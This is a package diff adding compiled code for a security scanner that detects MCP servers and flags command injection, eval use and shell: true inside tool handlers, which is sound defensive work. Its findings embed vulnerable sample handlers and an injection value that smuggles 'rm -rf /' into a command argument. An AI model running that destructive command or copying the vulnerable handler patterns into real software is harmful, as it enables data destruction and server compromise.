codeslick-cli 1.4.2 → 1.5.0

package/dist/src/lib/analyzers/helpers/mcp-detector.d.ts

@@ -0,0 +1,22 @@
+/**
+ * MCP Server Detection Guard
+ *
+ * Detects whether a source file is an MCP (Model Context Protocol) server.
+ * Detection is content-based (import/decorator patterns), NOT file-extension-based.
+ * This prevents false positives from non-MCP code.
+ *
+ * Used as a guard before MCP-specific security checks run.
+ *
+ * @module mcp-detector
+ */
+/**
+ * Returns true if the given source code is an MCP server.
+ *
+ * Checks both JS/TS and Python signals — the caller does not need to know
+ * which language is being analyzed.
+ *
+ * @param code - Full source code string
+ * @returns true if any MCP server signal is detected
+ */
+export declare function isMcpServer(code: string): boolean;
+//# sourceMappingURL=mcp-detector.d.ts.map

package/dist/src/lib/analyzers/helpers/mcp-detector.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"mcp-detector.d.ts","sourceRoot":"","sources":["../../../../../../../src/lib/analyzers/helpers/mcp-detector.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;GAUG;AA0BH;;;;;;;;GAQG;AACH,wBAAgB,WAAW,CAAC,IAAI,EAAE,MAAM,GAAG,OAAO,CAGjD"}

package/dist/src/lib/analyzers/helpers/mcp-detector.js

@@ -0,0 +1,50 @@
+"use strict";
+/**
+ * MCP Server Detection Guard
+ *
+ * Detects whether a source file is an MCP (Model Context Protocol) server.
+ * Detection is content-based (import/decorator patterns), NOT file-extension-based.
+ * This prevents false positives from non-MCP code.
+ *
+ * Used as a guard before MCP-specific security checks run.
+ *
+ * @module mcp-detector
+ */
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.isMcpServer = isMcpServer;
+/**
+ * Signals that identify a TypeScript/JavaScript MCP server file.
+ * Order: most specific first (SDK imports > API usage > class instantiation).
+ */
+const JS_MCP_PATTERNS = [
+    /@modelcontextprotocol\/sdk/, // Any import from the SDK package
+    /from\s+['"]@modelcontextprotocol\//, // ESM import from SDK
+    /require\s*\(\s*['"]@modelcontextprotocol\//, // CJS require from SDK
+    /new\s+McpServer\s*\(/, // new McpServer() instantiation
+];
+/**
+ * Signals that identify a Python MCP server file.
+ */
+const PY_MCP_PATTERNS = [
+    /from\s+mcp\.server\s+import/, // from mcp.server import Server
+    /from\s+mcp\s+import\s+FastMCP/, // from mcp import FastMCP
+    /import\s+mcp\b/, // import mcp (word boundary prevents mcp_client etc.)
+    /@mcp\.tool\s*\(\s*\)/, // @mcp.tool() decorator
+    /@server\.call_tool/, // @server.call_tool decorator (any form)
+];
+const ALL_PATTERNS = [...JS_MCP_PATTERNS, ...PY_MCP_PATTERNS];
+/**
+ * Returns true if the given source code is an MCP server.
+ *
+ * Checks both JS/TS and Python signals — the caller does not need to know
+ * which language is being analyzed.
+ *
+ * @param code - Full source code string
+ * @returns true if any MCP server signal is detected
+ */
+function isMcpServer(code) {
+    if (!code.trim())
+        return false;
+    return ALL_PATTERNS.some(pattern => pattern.test(code));
+}
+//# sourceMappingURL=mcp-detector.js.map

package/dist/src/lib/analyzers/helpers/mcp-detector.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"mcp-detector.js","sourceRoot":"","sources":["../../../../../../../src/lib/analyzers/helpers/mcp-detector.ts"],"names":[],"mappings":";AAAA;;;;;;;;;;GAUG;;AAmCH,kCAGC;AApCD;;;GAGG;AACH,MAAM,eAAe,GAAa;IAChC,4BAA4B,EAA0B,kCAAkC;IACxF,oCAAoC,EAAkB,sBAAsB;IAC5E,4CAA4C,EAAU,uBAAuB;IAC7E,sBAAsB,EAAgC,gCAAgC;CACvF,CAAC;AAEF;;GAEG;AACH,MAAM,eAAe,GAAa;IAChC,6BAA6B,EAAyB,gCAAgC;IACtF,+BAA+B,EAAuB,0BAA0B;IAChF,gBAAgB,EAAsC,sDAAsD;IAC5G,sBAAsB,EAAgC,wBAAwB;IAC9E,oBAAoB,EAAmC,yCAAyC;CACjG,CAAC;AAEF,MAAM,YAAY,GAAa,CAAC,GAAG,eAAe,EAAE,GAAG,eAAe,CAAC,CAAC;AAExE;;;;;;;;GAQG;AACH,SAAgB,WAAW,CAAC,IAAY;IACtC,IAAI,CAAC,IAAI,CAAC,IAAI,EAAE;QAAE,OAAO,KAAK,CAAC;IAC/B,OAAO,YAAY,CAAC,IAAI,CAAC,OAAO,CAAC,EAAE,CAAC,OAAO,CAAC,IAAI,CAAC,IAAI,CAAC,CAAC,CAAC;AAC1D,CAAC"}

package/dist/src/lib/analyzers/javascript/security-checks/mcp-security-exec-checks.d.ts

@@ -0,0 +1,49 @@
+/**
+ * MCP Execution Security Checks — JavaScript/TypeScript
+ *
+ * Contains code-execution and injection checks for MCP tool handlers:
+ *   MCP-JS-001 — Unvalidated tool parameter to dangerous sink
+ *   MCP-JS-007 — eval / Function constructor in tool handler
+ *   MCP-JS-002 — Command injection via shell: true
+ *
+ * These checks share brace-depth tracking to scope detection to tool handler
+ * callbacks only, avoiding false positives on exec() calls outside handlers.
+ *
+ * @module mcp-security-exec-checks
+ */
+import { SecurityVulnerability } from '../../types';
+import { CreateVulnerabilityFn } from './mcp-security';
+/**
+ * Scans for tool handler callbacks that pass unvalidated tool arguments directly
+ * to dangerous command-execution or filesystem sinks.
+ *
+ * Algorithm:
+ * 1. Walk lines looking for server.tool( entry points.
+ * 2. Once inside a handler, track brace depth to know when the handler ends.
+ * 3. On each line inside the handler, check if a tool arg access AND a dangerous
+ *    sink appear together → flag MCP-JS-001.
+ *
+ * Precision guarantee: exec() calls OUTSIDE a tool handler are not flagged,
+ * avoiding the false-positive class described in the design change note.
+ */
+export declare function checkUnvalidatedSink(code: string, createVulnerability: CreateVulnerabilityFn): SecurityVulnerability[];
+/**
+ * MCP-JS-007: eval / Function constructor in tool handler
+ * Severity: CRITICAL (CVSS 9.8) | CWE-95
+ *
+ * Detects dynamic code evaluation inside MCP tool handler callbacks.
+ * Only flags eval/Function/vm calls that appear within the lexical scope
+ * of a server.tool() callback (brace-depth tracking).
+ */
+export declare function checkEvalInHandler(code: string, createVulnerability: CreateVulnerabilityFn): SecurityVulnerability[];
+/**
+ * MCP-JS-002: Command injection via shell: true
+ * Severity: CRITICAL (CVSS 9.8) | CWE-78
+ *
+ * spawn/execFile with { shell: true } turns argument arrays into shell strings —
+ * making otherwise safe argument-array APIs injectable. Only flags when both
+ * the spawn/execFile call AND shell: true appear on the same line inside a
+ * tool handler.
+ */
+export declare function checkShellTrue(code: string, createVulnerability: CreateVulnerabilityFn): SecurityVulnerability[];
+//# sourceMappingURL=mcp-security-exec-checks.d.ts.map

package/dist/src/lib/analyzers/javascript/security-checks/mcp-security-exec-checks.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"mcp-security-exec-checks.d.ts","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/javascript/security-checks/mcp-security-exec-checks.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;GAYG;AAEH,OAAO,EAAE,qBAAqB,EAAE,MAAM,aAAa,CAAC;AACpD,OAAO,EAAE,qBAAqB,EAAE,MAAM,gBAAgB,CAAC;AA6BvD;;;;;;;;;;;;GAYG;AACH,wBAAgB,oBAAoB,CAClC,IAAI,EAAE,MAAM,EACZ,mBAAmB,EAAE,qBAAqB,GACzC,qBAAqB,EAAE,CAoJzB;AAMD;;;;;;;GAOG;AACH,wBAAgB,kBAAkB,CAChC,IAAI,EAAE,MAAM,EACZ,mBAAmB,EAAE,qBAAqB,GACzC,qBAAqB,EAAE,CA+DzB;AAOD;;;;;;;;GAQG;AACH,wBAAgB,cAAc,CAC5B,IAAI,EAAE,MAAM,EACZ,mBAAmB,EAAE,qBAAqB,GACzC,qBAAqB,EAAE,CA8DzB"}

package/dist/src/lib/analyzers/javascript/security-checks/mcp-security-exec-checks.js

@@ -0,0 +1,336 @@
+"use strict";
+/**
+ * MCP Execution Security Checks — JavaScript/TypeScript
+ *
+ * Contains code-execution and injection checks for MCP tool handlers:
+ *   MCP-JS-001 — Unvalidated tool parameter to dangerous sink
+ *   MCP-JS-007 — eval / Function constructor in tool handler
+ *   MCP-JS-002 — Command injection via shell: true
+ *
+ * These checks share brace-depth tracking to scope detection to tool handler
+ * callbacks only, avoiding false positives on exec() calls outside handlers.
+ *
+ * @module mcp-security-exec-checks
+ */
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.checkUnvalidatedSink = checkUnvalidatedSink;
+exports.checkEvalInHandler = checkEvalInHandler;
+exports.checkShellTrue = checkShellTrue;
+// ─── Detection patterns ────────────────────────────────────────────────────
+/** Matches the start of a tool handler registration: server.tool( or mcp.tool( */
+const TOOL_HANDLER_START = /(?:server|mcp)\.tool\s*\(/;
+/**
+ * Matches the parameter variable name(s) in a tool callback signature.
+ * Covers: ({ args }), ({ args, extra }), (params), (input), (request), (req)
+ */
+const TOOL_PARAM_NAMES = /\(\s*\{?\s*(args|params|input|request|req)\b/;
+// Note: eval() and new Function() are not included here — they are detected
+// with richer context (vm module variants, handler scope) in checkEvalInHandler() (MCP-JS-007).
+/** Dangerous command-execution sinks */
+const CMD_SINKS = /\b(exec|execSync|spawn|execFile|spawnSync)\s*\(/;
+/** Dangerous filesystem sinks */
+const FS_SINKS = /\bfs\.(writeFile|readFile|unlink|createReadStream|createWriteStream|appendFile)\s*\(/;
+/**
+ * Matches direct access to tool argument properties.
+ * e.g. args.command, params.arguments[0], input.path
+ */
+const TOOL_ARG_ACCESS = /\b(?:args|params|input|request|req)\s*(?:\.|\.arguments\s*\[|\[)/;
+// ─── MCP-JS-001: Unvalidated tool parameter to dangerous sink ─────────────
+/**
+ * Scans for tool handler callbacks that pass unvalidated tool arguments directly
+ * to dangerous command-execution or filesystem sinks.
+ *
+ * Algorithm:
+ * 1. Walk lines looking for server.tool( entry points.
+ * 2. Once inside a handler, track brace depth to know when the handler ends.
+ * 3. On each line inside the handler, check if a tool arg access AND a dangerous
+ *    sink appear together → flag MCP-JS-001.
+ *
+ * Precision guarantee: exec() calls OUTSIDE a tool handler are not flagged,
+ * avoiding the false-positive class described in the design change note.
+ */
+function checkUnvalidatedSink(code, createVulnerability) {
+    const vulnerabilities = [];
+    const lines = code.split('\n');
+    let inToolHandler = false;
+    let braceDepth = 0;
+    // Track how many open-braces appeared on the server.tool( line itself before
+    // the callback arrow/function, so we know the starting depth to compare against.
+    let handlerStartDepth = 0;
+    for (let i = 0; i < lines.length; i++) {
+        const line = lines[i];
+        const lineNumber = i + 1;
+        if (!inToolHandler) {
+            // Detect entry into a tool handler
+            if (TOOL_HANDLER_START.test(line) && TOOL_PARAM_NAMES.test(line)) {
+                inToolHandler = true;
+                // Count net brace change on this line to establish the baseline depth
+                // the handler's own opening brace will push us above.
+                const opens = (line.match(/\{/g) || []).length;
+                const closes = (line.match(/\}/g) || []).length;
+                braceDepth += opens - closes;
+                handlerStartDepth = braceDepth;
+                continue;
+            }
+            // Also handle multi-line: server.tool( on one line, callback with args on next
+            if (TOOL_HANDLER_START.test(line)) {
+                // Look ahead up to 3 lines for the callback signature
+                for (let j = i + 1; j <= Math.min(i + 3, lines.length - 1); j++) {
+                    if (TOOL_PARAM_NAMES.test(lines[j])) {
+                        inToolHandler = true;
+                        // Accumulate brace depth from the tool-start line through the param line
+                        for (let k = i; k <= j; k++) {
+                            const o = (lines[k].match(/\{/g) || []).length;
+                            const c = (lines[k].match(/\}/g) || []).length;
+                            braceDepth += o - c;
+                        }
+                        handlerStartDepth = braceDepth;
+                        i = j; // advance outer loop past the lookahead
+                        // The param-signature line (lines[j]) may also contain a sink on
+                        // the same line (e.g. `async ({ args }) => exec(args.command)`).
+                        // The outer loop will `continue` after this block, skipping the
+                        // inToolHandler branch for this line — so we check it right here.
+                        {
+                            const paramLine = lines[j];
+                            const hasArgAccess = TOOL_ARG_ACCESS.test(paramLine);
+                            const hasCmdSink = CMD_SINKS.test(paramLine);
+                            const hasFsSink = FS_SINKS.test(paramLine);
+                            if (hasArgAccess && (hasCmdSink || hasFsSink)) {
+                                const sinkType = hasCmdSink ? 'command execution' : 'filesystem';
+                                vulnerabilities.push(createVulnerability({
+                                    category: 'MCP-JS-001',
+                                    severity: 'CRITICAL',
+                                    confidence: 'HIGH',
+                                    message: `Unvalidated tool parameter passed directly to ${sinkType} sink`,
+                                    line: j + 1,
+                                    suggestion: 'Validate and sanitize tool arguments before passing to system calls. Use allowlists for commands and paths.',
+                                    owasp: 'A03:2021 - Injection',
+                                    cwe: 'CWE-78 OS Command Injection / CWE-22 Path Traversal',
+                                    pciDss: 'PCI-DSS 6.3.1',
+                                    attackVector: {
+                                        description: 'MCP tool arguments arrive from the AI model or user and must be treated as untrusted. Passing them directly to exec(), spawn(), or filesystem operations enables command injection and path traversal attacks.',
+                                        exploitExample: `server.tool('run', schema, async ({ args }) => exec(args.command));`,
+                                        realWorldImpact: [
+                                            'Remote code execution via command injection',
+                                            'Arbitrary file read/write via path traversal',
+                                            'Data exfiltration through crafted AI prompts',
+                                            'Server compromise from malicious tool arguments'
+                                        ]
+                                    },
+                                    remediation: {
+                                        before: `server.tool('run', schema, async ({ args }) => exec(args.command));`,
+                                        after: `const ALLOWED_COMMANDS = ['ls', 'pwd'];\nserver.tool('run', schema, async ({ args }) => {\n  if (!ALLOWED_COMMANDS.includes(args.command)) throw new Error('Disallowed command');\n  exec(args.command);\n});`,
+                                        explanation: 'Apply input validation with strict allowlists before passing tool parameters to any system call.'
+                                    }
+                                }));
+                            }
+                        }
+                        break;
+                    }
+                }
+                if (!inToolHandler) {
+                    // tool( found but no matching param pattern — update brace depth and continue
+                    const opens = (line.match(/\{/g) || []).length;
+                    const closes = (line.match(/\}/g) || []).length;
+                    braceDepth += opens - closes;
+                }
+                continue;
+            }
+            // Outside handler — still track brace depth for correctness
+            const opens = (line.match(/\{/g) || []).length;
+            const closes = (line.match(/\}/g) || []).length;
+            braceDepth += opens - closes;
+        }
+        else {
+            // Inside the tool handler
+            const opens = (line.match(/\{/g) || []).length;
+            const closes = (line.match(/\}/g) || []).length;
+            braceDepth += opens - closes;
+            // Exit when we've closed back to the depth before the handler's opening brace
+            if (braceDepth < handlerStartDepth) {
+                inToolHandler = false;
+                braceDepth = Math.max(0, braceDepth);
+                continue;
+            }
+            // Check: tool arg access flowing into a dangerous sink on the same line
+            const hasArgAccess = TOOL_ARG_ACCESS.test(line);
+            const hasCmdSink = CMD_SINKS.test(line);
+            const hasFsSink = FS_SINKS.test(line);
+            if (hasArgAccess && (hasCmdSink || hasFsSink)) {
+                const sinkType = hasCmdSink ? 'command execution' : 'filesystem';
+                // Use object-style overload to guarantee explicit CVSS 9.1 / CRITICAL severity.
+                // The legacy positional path derives severity from calculateSeverityScore() which
+                // does not know about MCP-JS-001 and would default to 'medium'.
+                vulnerabilities.push(createVulnerability({
+                    category: 'MCP-JS-001',
+                    severity: 'CRITICAL',
+                    confidence: 'HIGH',
+                    message: `Unvalidated tool parameter passed directly to ${sinkType} sink`,
+                    line: lineNumber,
+                    suggestion: 'Validate and sanitize tool arguments before passing to system calls. Use allowlists for commands and paths.',
+                    owasp: 'A03:2021 - Injection',
+                    cwe: 'CWE-78 OS Command Injection / CWE-22 Path Traversal',
+                    pciDss: 'PCI-DSS 6.3.1',
+                    attackVector: {
+                        description: 'MCP tool arguments arrive from the AI model or user and must be treated as untrusted. Passing them directly to exec(), spawn(), or filesystem operations enables command injection and path traversal attacks.',
+                        exploitExample: `server.tool('run', schema, async ({ args }) => {\n  exec(args.command); // args.command is attacker-controlled\n});`,
+                        realWorldImpact: [
+                            'Remote code execution via command injection',
+                            'Arbitrary file read/write via path traversal',
+                            'Data exfiltration through crafted AI prompts',
+                            'Server compromise from malicious tool arguments'
+                        ]
+                    },
+                    remediation: {
+                        before: `server.tool('run', schema, async ({ args }) => {\n  exec(args.command);\n});`,
+                        after: `const ALLOWED_COMMANDS = ['ls', 'pwd'];\nserver.tool('run', schema, async ({ args }) => {\n  if (!ALLOWED_COMMANDS.includes(args.command)) throw new Error('Disallowed command');\n  exec(args.command);\n});`,
+                        explanation: 'Apply input validation with strict allowlists before passing tool parameters to any system call. For filesystem operations, resolve the final path and verify it stays within an allowed directory boundary.'
+                    }
+                }));
+            }
+        }
+    }
+    return vulnerabilities;
+}
+// ─── MCP-JS-007 ──────────────────────────────────────────────────────────────
+const EVAL_SINKS = /\b(eval\s*\(|new\s+Function\s*\(|vm\.runInThisContext\s*\(|vm\.runInNewContext\s*\()/;
+/**
+ * MCP-JS-007: eval / Function constructor in tool handler
+ * Severity: CRITICAL (CVSS 9.8) | CWE-95
+ *
+ * Detects dynamic code evaluation inside MCP tool handler callbacks.
+ * Only flags eval/Function/vm calls that appear within the lexical scope
+ * of a server.tool() callback (brace-depth tracking).
+ */
+function checkEvalInHandler(code, createVulnerability) {
+    const vulnerabilities = [];
+    const lines = code.split('\n');
+    let inToolHandler = false;
+    let braceDepth = 0;
+    for (let i = 0; i < lines.length; i++) {
+        const line = lines[i];
+        const lineNumber = i + 1;
+        const trimmed = line.trim();
+        if (!inToolHandler) {
+            if (TOOL_HANDLER_START.test(line)) {
+                inToolHandler = true;
+                braceDepth = 0;
+            }
+        }
+        if (inToolHandler) {
+            for (const ch of line) {
+                if (ch === '{')
+                    braceDepth++;
+                if (ch === '}') {
+                    braceDepth--;
+                    if (braceDepth < 0) {
+                        inToolHandler = false;
+                        braceDepth = 0;
+                        break;
+                    }
+                }
+            }
+            if (inToolHandler && EVAL_SINKS.test(trimmed)) {
+                vulnerabilities.push(createVulnerability({
+                    category: 'MCP-JS-007',
+                    severity: 'CRITICAL',
+                    confidence: 'HIGH',
+                    message: 'Dynamic code execution (eval/Function/vm) inside MCP tool handler',
+                    line: lineNumber,
+                    suggestion: 'Never evaluate code strings from tool parameters. Refactor to use predefined logic or a sandboxed interpreter.',
+                    owasp: 'A03:2021 - Injection',
+                    cwe: 'CWE-95 Improper Neutralization of Directives in Eval',
+                    pciDss: 'PCI-DSS 6.3.1',
+                    attackVector: {
+                        description: 'A tool handler that calls eval() or new Function() with any input creates a code injection vulnerability. Any string reaching eval() becomes executable code within the process context.',
+                        exploitExample: `server.tool('run_code', schema, async ({ args }) => { eval(args.code); })`,
+                        realWorldImpact: [
+                            'Arbitrary code execution',
+                            'Full system compromise',
+                            'Data exfiltration',
+                            'Privilege escalation'
+                        ]
+                    },
+                    remediation: {
+                        before: `server.tool('run_code', schema, async ({ args }) => { eval(args.code); });`,
+                        after: `// Redesign: never evaluate dynamic code.\n// Use a safe interpreter or predefined operations.\nconst ALLOWED_OPS = { add: (a, b) => a + b };\nserver.tool('calc', schema, async ({ args }) => ALLOWED_OPS[args.op](args.a, args.b));`,
+                        explanation: 'Remove eval/Function/vm from tool handlers entirely. If code evaluation is required, use a sandboxed vm with strict resource limits and no network access.'
+                    }
+                }));
+            }
+        }
+    }
+    return vulnerabilities;
+}
+// ─── MCP-JS-002 ──────────────────────────────────────────────────────────────
+const SHELL_TRUE_PATTERN = /\bshell\s*:\s*true\b/;
+const SPAWN_PATTERN = /\b(spawn|execFile|spawnSync)\s*\(/;
+/**
+ * MCP-JS-002: Command injection via shell: true
+ * Severity: CRITICAL (CVSS 9.8) | CWE-78
+ *
+ * spawn/execFile with { shell: true } turns argument arrays into shell strings —
+ * making otherwise safe argument-array APIs injectable. Only flags when both
+ * the spawn/execFile call AND shell: true appear on the same line inside a
+ * tool handler.
+ */
+function checkShellTrue(code, createVulnerability) {
+    const vulnerabilities = [];
+    const lines = code.split('\n');
+    let inToolHandler = false;
+    let braceDepth = 0;
+    for (let i = 0; i < lines.length; i++) {
+        const line = lines[i];
+        const lineNumber = i + 1;
+        const trimmed = line.trim();
+        if (!inToolHandler) {
+            if (TOOL_HANDLER_START.test(line)) {
+                inToolHandler = true;
+                braceDepth = 0;
+            }
+        }
+        if (inToolHandler) {
+            for (const ch of line) {
+                if (ch === '{')
+                    braceDepth++;
+                if (ch === '}') {
+                    braceDepth--;
+                    if (braceDepth < 0) {
+                        inToolHandler = false;
+                        braceDepth = 0;
+                        break;
+                    }
+                }
+            }
+            if (inToolHandler && SPAWN_PATTERN.test(trimmed) && SHELL_TRUE_PATTERN.test(trimmed)) {
+                vulnerabilities.push(createVulnerability({
+                    category: 'MCP-JS-002',
+                    severity: 'CRITICAL',
+                    confidence: 'HIGH',
+                    message: 'spawn/execFile with shell: true inside MCP tool handler enables command injection',
+                    line: lineNumber,
+                    suggestion: 'Remove shell: true. Pass arguments as an array to spawn() without shell mode.',
+                    owasp: 'A03:2021 - Injection',
+                    cwe: 'CWE-78 OS Command Injection',
+                    pciDss: 'PCI-DSS 6.3.1',
+                    attackVector: {
+                        description: 'The shell: true option causes spawn/execFile to join arguments into a shell command string. This turns a safe API into an injection vector — any argument containing shell metacharacters will be interpreted by the shell.',
+                        exploitExample: `spawn(args.cmd, args.args, { shell: true })  // args.cmd = "ls; rm -rf /"`,
+                        realWorldImpact: [
+                            'Command injection via shell metacharacters',
+                            'Arbitrary command execution',
+                            'Data exfiltration'
+                        ]
+                    },
+                    remediation: {
+                        before: `spawn(cmd, args, { shell: true })`,
+                        after: `spawn(cmd, args, { shell: false })  // or omit shell option entirely`,
+                        explanation: 'Always pass command arguments as an array to spawn(). Never use shell: true with user-supplied input.'
+                    }
+                }));
+            }
+        }
+    }
+    return vulnerabilities;
+}
+//# sourceMappingURL=mcp-security-exec-checks.js.map

package/dist/src/lib/analyzers/javascript/security-checks/mcp-security-exec-checks.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"mcp-security-exec-checks.js","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/javascript/security-checks/mcp-security-exec-checks.ts"],"names":[],"mappings":"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